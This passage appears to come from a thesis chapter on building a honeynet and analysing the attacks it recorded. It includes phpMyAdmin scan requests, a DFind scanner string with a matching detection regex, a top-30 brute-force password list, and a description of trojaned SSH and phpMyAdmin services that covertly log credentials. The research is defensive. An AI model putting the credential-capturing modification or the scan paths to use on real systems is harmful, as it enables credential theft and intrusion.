Address Filtering Options | Address filtering options include information about black and white lists that control which machines are granted or denied access to the honeynet. Additionally, a so-called fence list can be defined in order to block outgoing connections from a decoy to specific network segments.
Alerting Mode Options | With these options, automatic email alerts that are sent to the honeynet administrator once an incident is detected by the Honeywall may be enabled or disabled.
Sebek Options | These options help configure the server component of the Sebek data monitoring utility. For instance, the destination address and the network port for the Sebek notification packets can be specified.

At the end of the interview, the affected filtering and monitoring services are restarted. However, before putting the Honeywall into operation, we adapt the local time zone and synchronize the hardware clock as illustrated by the Honeynet Project (2005c). These steps are essential for reconstructing the exact sequence of an incident during the later investigation phase. Furthermore, we initialize Tripwire[10], a host-based intrusion detection system that is already included in the system (see also Honeynet Project, 2005b). It periodically performs an integrity check for each file. In this way, potential manipulations of the individual components can be discovered.

[10] see http://www.tripwire.org/

Figure 5.1: Main Screen of the Walleye Web Management Interface

When all operations are finished, we may retrieve the status of the Honeywall at all times using the Walleye web management interface which is part of the Roo distribution. The management interface must be launched over an encrypted channel for security reasons.
After logging in as the admin user, a summary of the traffic flows entering or leaving the honeynet as well as the number of detected intrusions is displayed in the upper left corner of the screen (see Figure 5.1). By clicking on a highlighted element in one of the different columns, we can request additional information about network activities (see Figure 5.2). It is also possible to inspect specific connections in more detail, e.g., to examine a penetration attempt that was detected by our Honeywall as shown in Figure 5.3. In the given example, an attacker with the IP address 218.44.xxx.xxx repeatedly failed to access a network share on our Microsoft Windows honeypot via the NetBIOS and SMB (Server Message Block) protocols.

In addition to data analysis-related features, Walleye also allows us to fully reconfigure the honeynet architecture and supports changing certain system settings such as the keyboard language or the hostname. As a consequence, we can perform many administrative tasks comfortably over the Internet without needing to log in to the local machine. In summary, these mechanisms make the web management interface the primary tool for the everyday observation and maintenance of the honeynet.

Figure 5.2: Overview about the Network Flows from/to the Honeynet

Figure 5.3: Example of an Intrusion Attempt on a Honeypot

5.1.3 Preparation of the System Environment

Even though the Honeywall implements sophisticated applications to capture, control, and analyze malicious activities, we recommend setting up several other programs before connecting the honeynet to the external environment. These programs either help collect more extensive information about adversaries or facilitate the post-incident investigation process after a decoy has been compromised.

5.1.3.1 Implementation of Data Capture-Related Programs

• Sebek

Sebek[11] is a utility for capturing activities on a honeypot and is maintained by the Honeynet Project.
We have already described its architecture as well as its technical specification in detail in Chapter 3. Therefore, only the deployment process of the utility is presented in the following.

[11] see http://www.honeynet.org/tools/sebek/

As we have explained, Sebek consists of a client as well as a server component. The latter is part of the Honeywall, while the client component must be separately installed on each decoy. On Linux operating systems, Sebek is implemented as a loadable kernel module, i.e., it can be dynamically attached to the kernel at runtime (cf. Kroah-Hartman, 2006). For this reason, in order to build the module, we must first download the source code for the kernel the utility will later run on. In the next step, the source code must be prepared and compiled as outlined in Section 4.3.3.5 with respect to the custom kernel of our Live CD. When this operation is completed, we are able to start the configuration and compilation process of the Sebek module. The generated archive can then be transferred to the target system and be decompressed.

To deploy the Sebek client, we simply need to run the respective install script. However, before we execute the script, we need to make sure all its configuration parameters are correctly specified as outlined by the Honeynet Project (2003c). For instance, it is particularly important to define the MAC (Media Access Control) address and the destination port of the gateway system. Otherwise, client-related notification packets are not delivered to the Sebek server and cannot be analyzed on the Honeywall. When the module has been successfully installed, keystrokes and system-relevant information on the honeypot are captured until the machine is rebooted. In turn, if an adversary manages to restart the computer, her activities are not recorded any longer.
Therefore, we must carefully monitor the state of our decoys at all times and reinstall the monitoring devices if necessary.

The client component is also available for Microsoft Windows operating systems. It is implemented as a device driver and may be easily set up by running an installation wizard which is part of the main program archive. In our case, however, the affected systems became extremely unstable and kept crashing with a blue screen after the application had been deployed. For this reason, we omitted the Sebek package on our Windows XP honeypot, and data were collected solely with the help of network monitoring devices.

• Trojaned System Services

The Sebek utility is most helpful for monitoring attackers after a system has been successfully compromised. On the other hand, it is not capable of gathering extensive information about penetration attempts. For example, when an intruder fails to log in to a specific machine, the respective authentication credentials are not recorded. If strong encryption algorithms are being used, we are not able to recover these pieces of information from the captured network logs either. The data is of high value though, because common usernames and passwords that are tested during an attack can be identified.

Figure 5.4: Example of a Trojaned System Service

Therefore, to close the information gap, we implement trojaned versions of a number of system services such as the SSH server or the phpMyAdmin database administration program. For this purpose, we edit the source code of the applications and adapt their authentication procedure as follows: When an intruder enters a username and corresponding password, the data is silently written to a special file before it is encrypted and processed. The file is protected with our own encryption key to conceal its content.
We also restore its access and modification timestamps so it does not stand out from other files in the same directory. The entire process for a sample trojaned system service is illustrated in Figure 5.4.

Even though the approach helps capture data about adversaries, it suffers from several disadvantages: First, we store security-relevant information directly on a honeypot. Hence, the data may potentially be discovered and deleted. Consequently, the requirements and standards as postulated by the Honeynet Project (2004a) are violated. Second, a skilled attacker can rather easily detect the manipulation. For instance, by running the strace command, it is possible to monitor all files that are referenced by a process. Due to these weaknesses, the solution is only applicable on an interim basis and must be replaced by more efficient implementations in the long term.

5.1.3.2 Implementation of Data Analysis-Related Programs

After a decoy has been compromised, we usually have to parse through an enormous amount of data in order to recover the individual steps and activities of the intruder. These operations are extremely time-consuming. For example, members of the Honeynet Project (2004c) expect to “spend up to forty hours of analysis for each hour of attack traffic that has been collected from the honeynet”. Furthermore, an analysis is often complex, because multiple sources of information such as network packet dumps or log files must be linked in order to see “the big picture”, corroborate hypotheses, and draw conclusions. However, various tools may significantly support the work of security professionals and honeynet administrators and can be of great help when examining an incident. These tools can be divided into different categories and are briefly described in the following.
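As a minimal sketch of what linking several sources of information can look like in practice, the following Python example merges two chronologically sorted event lists into a single timeline. The event structure, the source labels, and all sample records are hypothetical and serve illustration only; they are not taken from the honeynet data or from any of the tools described in this chapter.

```python
import heapq
from datetime import datetime
from typing import Iterable, Iterator, NamedTuple


class Event(NamedTuple):
    timestamp: datetime
    source: str   # illustrative label, e.g. "snort" or "firewall"
    message: str


def merge_timelines(*sources: Iterable[Event]) -> Iterator[Event]:
    """Merge several chronologically sorted event streams into one timeline."""
    # heapq.merge assumes that every input is already sorted by the key.
    return heapq.merge(*sources, key=lambda event: event.timestamp)


# Hypothetical sample records, invented for illustration only.
snort_alerts = [
    Event(datetime(2008, 3, 1, 12, 0, 5), "snort", "alert: FTP login attempt"),
    Event(datetime(2008, 3, 1, 12, 2, 30), "snort", "alert: outbound IRC traffic"),
]
firewall_log = [
    Event(datetime(2008, 3, 1, 12, 0, 1), "firewall", "inbound TCP connection, port 21"),
    Event(datetime(2008, 3, 1, 12, 2, 29), "firewall", "outbound TCP connection, port 6667"),
]

timeline = list(merge_timelines(snort_alerts, firewall_log))
for event in timeline:
    print(event.timestamp.isoformat(), event.source, event.message)
```

Such a merged view only makes sense if all clocks involved are synchronized, which is one reason why the time settings of the Honeywall are adjusted before it is put into operation.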
• Network-Related Analysis Tools

As we have already explained, all network flows entering or leaving the honeynet are recorded with the help of several data capture applications (see Chapter 3 and Honeynet Project, 2004a). These flows are stored within so-called PCAP (packet capture) files and are essential when certain actions of an adversary must be studied in more detail. To process these files efficiently, we recommend installing four tools, namely Wireshark, SSLDump, Honeysnap, and DataEcho.

Wireshark[12] is, according to its creators, one of the leading network analyzers (see also Orebaugh et al., 2007) and is available for many different platforms, including both Linux and Microsoft Windows operating systems. In contrast to similar applications such as Tcpdump[13], PCAP files are not processed on the system console but are presented in a feature-rich graphical user interface. This makes it easy, for instance, to reconstruct the complete conversation of an FTP session (see Figure 5.5) or to inspect specific packet streams with the help of a powerful filtering language. As we will see later, Wireshark is also capable of dealing with encrypted traffic once the correct key is provided.

Even when a network analyzer is being used, a secured communication channel may easily remain undiscovered in the vast number of network flows if it is established on non-standard system ports. For this case, we can run the SSLDump utility by Eric Rescorla[14]. It makes it possible to identify any connections that are protected with the SSL (Secure Sockets Layer) or TLS (Transport Layer Security) protocols. Although the underlying data packets cannot be read unless a so-called keyfile and corresponding password are specified, encrypted network activities within a honeynet are suspicious by nature and should be carefully watched (cf. Honeynet Project, 2004b).
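To illustrate how SSL/TLS connections can be recognized independently of the port number, the following Python sketch checks whether a TCP payload begins with what looks like a handshake record. It is not the implementation used by SSLDump; the function name and the sample bytes are assumptions made for illustration. The check relies only on the record layout shared by SSL 3.0 and TLS, i.e., a one-byte content type, a two-byte version, and a two-byte length.

```python
import struct

HANDSHAKE = 0x16                   # record content type "handshake"
MAX_RECORD_LENGTH = 2**14 + 2048   # generous upper bound for a record body


def looks_like_tls_handshake(payload: bytes) -> bool:
    """Heuristically test whether a payload starts with an SSL 3.0/TLS handshake record."""
    if len(payload) < 5:
        return False
    # Record header: content type (1 byte), version (2 bytes), length (2 bytes).
    content_type, major, minor, length = struct.unpack("!BBBH", payload[:5])
    return (
        content_type == HANDSHAKE
        and major == 3     # SSL 3.0 and TLS records carry major version 3
        and minor <= 3     # 3.0 = SSL 3.0, 3.1 to 3.3 = TLS 1.0 to 1.2
        and 0 < length <= MAX_RECORD_LENGTH
    )


# Hypothetical payloads: the first bytes of a handshake record and an FTP banner.
client_hello_start = bytes([0x16, 0x03, 0x01, 0x00, 0x2F]) + b"\x01"
ftp_banner = b"220 FTP server ready\r\n"

print(looks_like_tls_handshake(client_hello_start))
print(looks_like_tls_handshake(ftp_banner))
```

The heuristic is deliberately simple: it inspects only the first five bytes of a payload, does not recognize handshakes in the older SSL 2.0 framing, and may occasionally match unrelated binary data. Flows flagged in this way would therefore still need to be confirmed with a dedicated tool.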
To get a general overview of the contents of a PCAP file, the Honeysnap program by Arthur Clune is very useful[15]. It is distributed free of charge by members of the Honeynet Project and requires a pre-installed Python environment[16] to be executed properly. With Honeysnap, we are able to generate summary reports about traffic flows, dissect individual connections, and analyze certain communication protocols in depth. We can also search for specific keywords and commands within a recorded IRC (Internet Relay Chat) session. The latter is particularly interesting, because the IRC protocol is frequently abused by adversaries to control so-called botnets, i.e., networks of compromised machines (see Holz, 2005; Bächer et al., 2008).

[12] see http://www.wireshark.org/
[13] see http://www.tcpdump.org/
[14] see http://www.rtfm.com/ssldump/
[15] see https://projects.honeynet.org/honeysnap/
[16] see http://www.python.org/

Figure 5.5: Restoring a Captured FTP Session with Wireshark

Finally, we suggest installing DataEcho[17] by the Solera Networks group which is particularly suitable for analyzing web application-related activities. It implements its own web browser and permits viewing page requests and responses comfortably in a graphical window. In the example shown in Figure 5.6, DataEcho restores an attack tool that was run during an intrusion into one of our decoys.

[17] see http://sourceforge.net/projects/data-echo/

Figure 5.6: Analyzing Web-Based Attacks with DataEcho

• File-Related Analysis Tools

Adversaries often transfer their own tools and applications to the target machine, either to fully penetrate the system or to use it as a starting point for further attacks (cf. Honeynet Project, 2000b). In many cases, however, these tools are erased after being executed in order to hide traces and evade detection.
On the other hand, the programs may provide significant hints concerning the origin, intentions, and skills of the attacker and, therefore, are worth restoring. To recover deleted information on a honeypot, we can try to analyze sections of memory as well as file partitions on the respective hard disks. This approach is explained in detail by Farmer and Venema (2005). Alternatively, we may attempt to reconstruct the affected data directly from our network records. We present two tools that are explicitly designed for these purposes.

With PEHunter by Tillmann Werner[18], we can extract Microsoft Windows executables from the network traffic. The application consists of a server and a client component and must be built and executed on a Linux operating system as shown in Listing 5.1. When the server is started, it is bound to an open system port and begins processing the recorded network packets that are replayed by the client program. Once the header of an executable is found, the file is restored and saved to hard disk.

Header recognition techniques are also implemented in Foremost[19], a so-called data carving utility that was originally developed by the United States Air Force Office of Special Investigations (AFOSI) and the Center for Information Systems Security Studies and Research (CISR). It is compatible with Linux operating systems and variants of the Berkeley Software Distribution (BSD) and is freely available for download. One of its primary features is to recover images and pictures from network streams, but it often manages to recover documents as well as video and audio files, too.

    # build the individual components of PEHunter
    gcc -o pehuntd pehuntd.c pehuntd.h md5.c md5.h -Wall -Werror
    gcc -o pehuntc pehuntc.c -Wall -Werror

    # grant execute permissions to the built components
    chmod 755 pehuntd pehuntc

    # execute the server and extract the captured binaries
    ./pehuntd
    ./pehuntc <packet capture file>

Listing 5.1: Restoring Windows Executables with PEHunter

• Log File-Related Analysis Tools

Apart from recorded network dumps, log files that are generated by the Snort intrusion detection system on the Honeywall contain valuable information about security-relevant incidents, e.g., the date, time, and origin of an attack. Since a different log file is created for each day, accumulating the data manually and preparing a monthly or even annual status report of the honeynet can be quite cumbersome. For this reason, we install the SnortALog utility by Jérémy Chartier[20]. It only requires a working Perl interpreter and, hence, can be run on most platforms, including Microsoft Windows. SnortALog is capable of processing multiple log files simultaneously. It prints a summary of the detected alerts and the IP addresses involved and sorts the entries according to their severity. Furthermore, by means of a number of filter expressions, specific warning and notification messages by the intrusion detection system can be excluded from the final report if desired. These features make SnortALog highly efficient when observing the state of individual decoys and help security professionals save time during an investigation.

[18] see http://honeytrap.mwcollect.org/pehunter.html
[19] see http://foremost.sourceforge.net/
[20] see http://jeremy.chartier.free.fr/snortalog/

• System-Related Analysis Tools

After a system has been compromised, we must not use its file and process utilities for our analysis for several reasons: First, the operating system may be subject to subversion (cf. Carrier, 2006).
For example, many attackers download rootkits to the target computer after a successful intrusion in order to conceal their presence. Rootkits are “Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to and hide on a machine” (Skoudis and Zeltser, 2003, p. 303). Because of these modifications, the underlying platform must not be trusted any longer. Second, by executing programs on the local computer, the MAC times of certain files are likely to be updated. The MAC times keep track of when a file or its meta-information was last accessed, modified, or changed (cf. Farmer and Venema, 2005). When these times are altered, we are unable to restore the original state after the break-in, the system is contaminated with our own traces, and pieces of evidence are potentially destroyed.

To circumvent these problems, we propose booting a penetrated honeypot from the Helix forensic Live CD[21]. It contains many applications that are helpful for an investigation, including the md5deep file integrity utility[22]. With md5deep, we can recursively calculate or check cryptographic checksums of entire file systems within a short amount of time. These checksums may then be compared against official black and white lists such as the National Software Reference Library (NSRL) in order to quickly identify malicious applications (see NIST, 2008). During the examination, Helix also mounts all partitions of the inspected machine as read-only by default. Consequently, we are never at risk of overwriting valuable information or data.

5.1.4 Summary of the Implementation and Deployment Process

Several key factors have to be taken into consideration when deploying a honeynet. First, we recommend setting up at least two decoys with different operating systems and applications to capture attacks on multiple platforms.
In our case, we implement honeypots based on both Linux and Microsoft Windows operating systems with various system services that are commonly targeted “in the wild”. A summary illustration of the entire system architecture is presented in Figure 5.7.

[21] see http://helix.e-fense.com/Download.php
[22] see http://md5deep.sourceforge.net/

Figure 5.7: System Architecture of the Honeynet

The machines must be permanently watched with the help of the Honeywall, a monitoring and filtering gateway device that permits controlling all inbound and outbound network activities. The Honeywall needs to be carefully configured to prevent external third parties from getting harmed.

After a honeypot has been compromised, we have to examine the individual steps and actions of the intruder to learn more about her motives, tactics, and intentions. During the analysis, the Walleye web management tool which is part of the Honeywall is of great help. It offers a comfortable user interface for the generated data records, e.g., network packet dumps, firewall logs, and other system-relevant information. In addition to Walleye, a number of further programs are noteworthy for an investigation as well, most importantly Wireshark, a powerful network analyzer that enables inspecting traffic flows in detail.

In the following section, we give an overview of the collected honeynet data and outline the results of our research. Two particularly interesting attacks are presented in depth in Section 5.3.

5.2 Overview about the Collected Honeynet Data

Our honeynet was successfully connected to the Internet on February 27, 2008. For slightly more than 5 months, we monitored connections to and from our decoys. During this observation period, we captured more than 21.5 GB of raw network traffic, including more than 130 million packets.
Manually investigating these huge amounts of data is infeasible. Therefore, a significant level of automation is required to dissect the individual flows and generate statistical reports. The different tools and utilities we have introduced in the previous section are invaluable for these tasks. However, in many cases, we also need to develop our own scripts, e.g., to extract certain text or data patterns, or to examine particularly interesting information in more detail. Unless otherwise stated, these scripts are included on the accompanying CD of this thesis.

A concise summary of the interactions with our honeynet is presented below. A description of specific attacks that we have frequently been confronted with is the subject of Section 5.2.2.

5.2.1 Interactions with the Honeynet

In the course of the observation period, we monitored communication requests from more than 3,900 different IP addresses. As illustrated on the world map depicted in Figure 5.8, the respective hosts were spread over all continents. Areas drawn in darker red reflect clusters with more than 100 machines. The top countries with the highest number of unique systems are shown in Table 5.3. The list comprises China, the United States as well as several Western European countries such as Germany or France. These results are consistent with findings by Holz (2006) and Curran et al. (2005). Surprisingly, many connections were also initiated from computers located in Taiwan. In contrast, many countries in Northern and Eastern Europe, South America, and Africa interacted only slightly with our honeynet, if at all. These countries are shown in lighter green in Figure 5.8.

It is important to note though that not every network flow coming from or going to a honeypot necessarily implies an attack. For example, legitimate system components may periodically contact external servers, e.g., to check for new program updates (cf. Honeynet Project, 2004b). These update procedures cannot be disabled in all cases.
As a result, data records are polluted to a certain degree. For this reason, the amount of captured traffic is a reliable indicator of neither the quantity nor the quality of incidents.

Figure 5.8: Origins of Machines Interacting with the Honeynet

#  | Country        | Number of Systems Involved
1  | China          | 868
2  | United States  | 632
3  | Germany        | 295
4  | Canada         | 226
5  | Taiwan         | 183
6  | France         | 163
7  | Italy          | 142
8  | Japan          | 105
9  | Netherlands    | 100
10 | United Kingdom | 80

Table 5.3: Top 10 Countries Interacting with the Honeynet

We may estimate the extent of malicious activities more accurately by analyzing notifications that are generated by the Snort intrusion detection system. In sum, more than 13,600 threats were identified. These threats can be distinguished according to their priority rating and their attack classification as indicated in Figure 5.9(a) and Figure 5.9(b). As can be seen, more than 86% of all alerts were raised by autonomously propagating worms or automated password brute force utilities.

Figure 5.9: Classification of Attacks Reported by the Snort Intrusion Detection System. (a) Priority-Based Classification. (b) Activity-Based Classification.

Password brute force attacks usually intend to compromise the administrative account of a machine, as we will see in a later section of this thesis. If such an operation succeeds, the entire system platform is at imminent risk. Therefore, this type of incident must be monitored with a high priority. The same holds true in case a web application is compromised (cmp. Andrews and Whittaker, 2006). Unfortunately, only a small number of intruders sought to exploit file inclusion vulnerabilities (cmp. Section 5.1.1) or other types of security weaknesses. All of these efforts failed in the end. In contrast, many worms we have observed targeted older vulnerabilities that are fixed on most modern computer systems.
A successful penetration is unlikely in these cases. Consequently, these malware species may be investigated with lower priority. Likewise, port scans and other information gathering attempts do not directly affect the integrity of a honeypot. That is why these activities are rated with a lower priority as well.

5.2.2 Common Attacks on the Honeynet

Throughout the observation period, certain types of attacks were repeatedly launched against our honeynet. As members of the Honeynet Project report, these types of attacks are commonly found in other honeynet setups as well (cmp. Honeynet Project, 2004b, p. 56-57). However, we need to emphasize that a significant number of the threats presented below were not correctly recognized by the default rule set of the Snort intrusion detection system. The Distributed Denial of Service attacks on one of our decoys, which are illustrated in more detail in Section 5.2.2.5, were not indicated at all. For this reason, we strongly recommend examining captured traffic flows regularly with additional data analysis utilities. The tools and applications introduced in Section 5.1.3.2 are well suited for these tasks. With their help, anomalies and suspicious network patterns are likely to be found more easily.

5.2.2.1 Application and Vulnerability Scans

Attackers usually go through some phase of active reconnaissance prior to an intrusion in order to learn as much as possible about the target platform (cmp. McClure et al., 2005). This phase includes so-called fingerprinting and mapping techniques that help identify the operating system as well as running services and applications (see Ruef, 2007, for a systematic approach to these steps). A comprehensive knowledge of the system configuration and its flaws may greatly facilitate a later penetration. Nevertheless, information gathering activities are often narrowed down to a certain type of vulnerability only.
As a result, adversaries solely test whether or not a system is exposed to a specific attack. If this is the case, the respective host is exploited; otherwise, the blackhat moves on and probes another machine. As members of the Honeynet Project (2004b, p. 563) conclude, most intruders “are not interested in breaking into a specific system, but interested into as many systems as possible” and “focus on the easy kill”.

To a great degree, these tasks can be automated with scripts and freely available toolkits. For instance, the DFind [23] utility by Arnaud Dovi is able to search for vulnerable web servers, database management systems, and various other security weaknesses. It leaves suspicious traces in the log files, though, as shown in Figure 5.10. The string w00tw00t.at.ISC.SANS.DFind clearly stands out and quickly catches the eye of a trained analyst. Therefore, the DFind utility may be detected quite easily. On average, we monitored three of these scans per day.

Figure 5.10: Request of the DFind Vulnerability Scanner

    GET /phpmyadmin/main.php HTTP/1.0
    GET /admin/main.php HTTP/1.0
    GET /mysql/main.php HTTP/1.0
    GET /PMA/main.php HTTP/1.0
    GET /phpMyAdmin-2.6.3/main.php HTTP/1.0
    GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0
    GET /phpmyadmin2/main.php HTTP/1.0
    GET /db/main.php HTTP/1.0
    ...

Listing 5.2: Example of a Network Scan for Instances of the phpMyAdmin Database Administration Program

In addition, our honeypots were frequently checked for installations of the phpMyAdmin database administration program. For this purpose, adversaries sent sample requests to typical application directories. As indicated in Listing 5.2, tests covered both generic and version-specific installation paths of the software. In total, more than 10,000 connections were initiated; fewer than 3% were successful and provoked a response.
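The scan patterns described above lend themselves to simple automated matching. The following Python sketch is an illustration under stated assumptions and not one of the scripts shipped on the accompanying CD: it assumes that HTTP request lines have already been extracted from the captured traffic as plain strings, and the names classify_request and summarize as well as the sample requests are hypothetical. The probe directories are those visible in Listing 5.2, and the DFind marker is the string quoted in the text.

```python
import re
from collections import Counter

# Marker string left behind by the DFind scanner (quoted in the text).
DFIND_MARKER = "w00tw00t.at.ISC.SANS.DFind"

# Directory names probed in Listing 5.2; versioned phpMyAdmin directories
# are covered by a prefix pattern. Illustrative, not exhaustive.
PMA_PROBE = re.compile(
    r"^GET\s+/(phpmyadmin2?|admin|mysql|PMA|db|phpMyAdmin-[\w.\-]+)/main\.php\s",
    re.IGNORECASE,
)

def classify_request(request_line: str) -> str:
    """Return a coarse label for a single HTTP request line."""
    if DFIND_MARKER in request_line:
        return "dfind-scan"
    if PMA_PROBE.match(request_line):
        return "phpmyadmin-probe"
    return "other"

def summarize(request_lines):
    """Count how often each label occurs in an iterable of request lines."""
    return Counter(classify_request(line) for line in request_lines)

# Hypothetical sample input for demonstration purposes.
sample = [
    "GET /phpmyadmin/main.php HTTP/1.0",
    "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0",
    "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1",
    "GET /index.html HTTP/1.0",
]
print(summarize(sample))
```

A simple substring and prefix match of this kind is only a first filter. It would miss probes against directories that are not in the list, so the resulting counts should be read as a lower bound.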
Even though a success rate of less than 3% may appear minor, an instance of the program that is fully accessible over the network poses a significant threat to the entire system architecture, as we will see in Section 5.3.1.

[23] see http://heapoverflow.com/f0rums/projects/tools/20-dfind-port-scanner/

5.2.2.2 Spam-Related Attacks

One type of incident that we have witnessed particularly often is known as the PopUp Spam attack (see Baldwin, 2003). It abuses the Microsoft Windows Messenger Service to deliver unsolicited bulk text messages to computer users. The Messenger Service was originally designed to help system administrators send status messages across a network (cmp. Microsoft Corporation, 2004a). By default, it is only enabled on Microsoft Windows 2000 operating systems as well as on Microsoft Windows XP prior to Service Pack 2. Modern-day computer systems are not affected.

Various techniques exist to carry out the attack successfully: A spammer may, for instance, invoke a series of simple net send commands to start interacting with the remote message service. In this case, requests are transported via the NetBIOS and SMB (Server Message Block) network protocols (see Baldwin, 2002b). For this purpose, however, a full TCP connection must be established with the machine of the victim, and a bi-directional communication channel is opened on port 139. Because this channel may be traced back to the sender, the attacker cannot trivially conceal her identity. A more sophisticated approach is to wrap the message inside a single UDP datagram and pass it directly to the processing queue of the service, which listens on an ephemeral port in the range of 1025 to 1029 (see Baldwin, 2003). The User Datagram Protocol (UDP) is unreliable and connectionless, i.e., packet deliveries do not need to be acknowledged, as opposed to the TCP-based transport mechanism used in the former attack (see Comer, 2000; Postel, 1980).
Due to these characteristics, the adversary may forge the source address of the message more easily and stay anonymous.

When a spam message arrives at the client system, a notification box “pops up”, claiming that a number of security weaknesses have been found that need fixing. Typically, a specific commercial product is offered for sale as a solution. An example of such a message is shown in Listing 5.3.

    "STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION.
    Windows has found 55 Critical System Errors.
    To fix the errors please do the following:
    1. Download Registry Update from: <xxx>
    2. Install Registry Update
    3. Run Registry Update
    4. Reboot your computer
    FAILURE TO ACT NOW MAY LEAD TO SYSTEM FAILURE!"

Listing 5.3: Example of a PopUp Spam Message

Figure 5.11: Geographical Spread of PopUp Spam Attacks

City       | Number of Systems Involved | Number of Messages Sent
Haerbin    | 78                         | 12,925
Mudanjiang | 7                          | 1,474
Shanghai   | 1                          | 4
Shenyang   | 2                          | 27
Taiyuan    | 33                         | 3,772
Zhenjiang  | 4                          | 387

Table 5.4: Origins of PopUp Spam Attacks

Even though the attack does not cause any direct damage, an inexperienced user may fall prey to the con and be tricked into buying a dubious software application. Furthermore, considering the frequency with which similar messages are received, this type of advertisement quickly gets annoying: On average, we monitored 53 product offers per day. In total, we captured more than 19,200 messages. All of these messages were sent from 125 machines located in six Chinese cities. The geographical spread of the attacks is visualized in Figure 5.11; a summary of our analysis is given in Table 5.4.

5.2.2.3 Malware-Based Attacks

As we have already explained, a large number of alerts were raised by the Snort intrusion detection system due to worm activities. For example, we calculated a mean value of 23 attacks per day by the Slammer worm (a.k.a. Sapphire) alone. This type of malware exploits a buffer-overflow vulnerability in the Microsoft SQL Server 2000 database management system or in the Microsoft SQL Server Desktop Engine (MSDE) (see CERT, 2003a). Due to its small size of slightly more than 400 bytes and a UDP-based propagation strategy, the worm spreads significantly faster than other threats such as Code Red or Nimda (cmp. Moore et al., 2003).

Figure 5.12: Packet Dump of the Slammer Worm

The payload of a captured Slammer packet is shown in Figure 5.12. We clearly see several strings such as dllhel32hkernQhounthickChGetTf or toQhsend that may be used to create a unique fingerprint of the worm. Similar techniques can be applied to identify other common malicious activities that are monitored within a honeynet. This process can also be automated as illustrated by Kreibich and Crowcroft (2004): With the Honeycomb application [24], it is possible to automatically analyze captured traffic of a honeypot and generate corresponding signatures for network monitoring devices. Similar approaches have also been pursued by Singh et al. (2004) with Earlybird, Kim and Karp (2004) with Autograph, Newsome et al. (2005) with Polygraph, as well as Li et al. (2006) with Hamsa (see also Wang et al., 2006).

5.2.2.4 Password Brute Force and Dictionary Attacks

Throughout the entire observation period, our honeypots were constantly hit by automated brute force or dictionary attacks, i.e., intruders tested a large number of username and password combinations in order to find valid authentication credentials for specific system services and applications such as the secure shell server or the phpMyAdmin database administration program. As indicated in Figure 5.13, the attacking machines were spread over five continents. Many probes originated from Western European countries, e.g., France (66,457 attacks) or Sweden (61,247 attacks).
However, certain geographic areas of the eastern hemisphere were significantly involved in the incidents as well. For example, more than 24,000 password checks were detected from cities in Australia, and more than 17,000 login attempts were traced to Hong Kong.

[24] see http://www.icir.org/christian/honeycomb/

Figure 5.13: Origins of Password Brute Force Attacks

With the help of the trojaned program routines that we had implemented in our system services, we were able to intercept the individual authentication credentials in the clear before they were encrypted (cmp. Section 5.1.3.1). In sum, we captured almost 295,000 passwords. After analyzing the data in more detail, we generated a dictionary of about 65,000 unique words. This dictionary may help users assess the quality of their own credentials, because any entry in the list must be regarded as insufficiently strong and reflects a security weakness. The top 30 passwords that we recorded are shown in Table 5.5. As can be seen, password tests included single letters, words, strings concatenated according to the keyboard layout (e.g., asdfgh), sequences of numbers, and variations of these categories (e.g., test123). Furthermore, names of persons, swear words, and derogatory expressions were also frequently chosen. It is also noteworthy that, on average, in three out of 100 attacks, blackhats tried to completely circumvent the authentication procedure and did not specify any password.

The majority of intruders sought to compromise the root superuser account of the operating system or the database management application, respectively (see Figure 5.14). In 24% of all cases, a non-privileged user or a non-privileged system account such as ftp or www was targeted. These accounts are often only weakly protected (cmp. Klein, 1990). After a successful breach, the attacker is possibly able to escalate her privileges (see Honeynet Project, 2004b).
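The step from raw captures to a dictionary of unique words and a frequency ranking can be sketched in a few lines of Python. This is a minimal illustration, assuming the intercepted credentials are available as (username, password) pairs; the sample records and the function name build_dictionary are hypothetical and do not reproduce the captured honeynet data.

```python
from collections import Counter

def build_dictionary(attempts):
    """Derive a unique-password dictionary and frequency counts.

    attempts: iterable of (username, password) pairs; an empty string
    stands for a login attempt that did not specify any password.
    """
    passwords = [password for _user, password in attempts]
    counts = Counter(passwords)
    dictionary = sorted(p for p in counts if p)  # unique, non-empty words
    empty_share = counts[""] / len(passwords) if passwords else 0.0
    return dictionary, counts, empty_share

# Hypothetical sample records, not taken from the honeynet data.
sample = [
    ("root", "123456"), ("root", "password"), ("admin", "123456"),
    ("ftp", "ftp"), ("root", ""), ("www", "test123"),
]
dictionary, counts, empty_share = build_dictionary(sample)

# Ranking of non-empty passwords by frequency (cf. Table 5.5).
ranking = [p for p, _n in counts.most_common() if p]
print(dictionary)
print(ranking[0])
print(round(empty_share, 2))
```

Counting the targeted usernames instead of the passwords works the same way and would yield a breakdown comparable to the one in Figure 5.14.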
Attacks on non-privileged accounts must therefore be regarded as a severe threat, too. What is quite surprising, though, is the fact that adversaries attempted to log in as admin or administrator more than 28,000 times. Considering that, by default, these two usernames are usually undefined for both the SSH server and the phpMyAdmin application, the attacks were doomed to fail and suggest rather little technical understanding.

#  | Password | #  | Password | #  | Password
1  | 123456   | 11 | roo      | 21 | oracle
2  | 123      | 12 | !@       | 22 | passwd
3  | 1234     | 13 | abc123   | 23 | 1q2
4  | password | 14 | qwerty   | 24 | 1q2w3e
5  | 12345    | 15 | abc      | 25 | 12345678
6  | test     | 16 | changeme | 26 | mysql
7  | admin    | 17 | adm      | 27 | 1234567
8  | a        | 18 | user     | 28 | test123
9  | root     | 19 | master   | 29 | guest
10 | 1        | 20 | p        | 30 | asdfgh

Table 5.5: Top 30 Passwords Used During Brute Force Attacks

Figure 5.14: User Accounts Targeted By Password Brute Force Attacks

5.2.2.5 Distributed Denial of Service Attacks

In addition to the incidents outlined above, our honeynet was also struck by so-called Distributed Denial of Service (DDoS) attacks. One approach to carry out such an attack is to flood the target system with a huge number of network packets (see Peng et al., 2007). Thereby, its resources such as memory or processing time are exhausted, and incoming requests cannot be properly processed any longer. As a result, the performance level is degraded, and the server becomes unresponsive or may even crash (see also Handley and Rescorla, 2006; CERT, 2001c). To successfully take the victim off the Internet, the adversary abuses several machines under her control. At a certain point in time, these machines are commanded to start a coordinated packet storm. A schematic overview of this procedure is illustrated in Figure 5.15; a more detailed explanation is given by Mölsä (2005). As Peng et al. (2007) point out, typically the TCP, ICMP, or UDP network protocols are used as transport mechanisms for these operations.
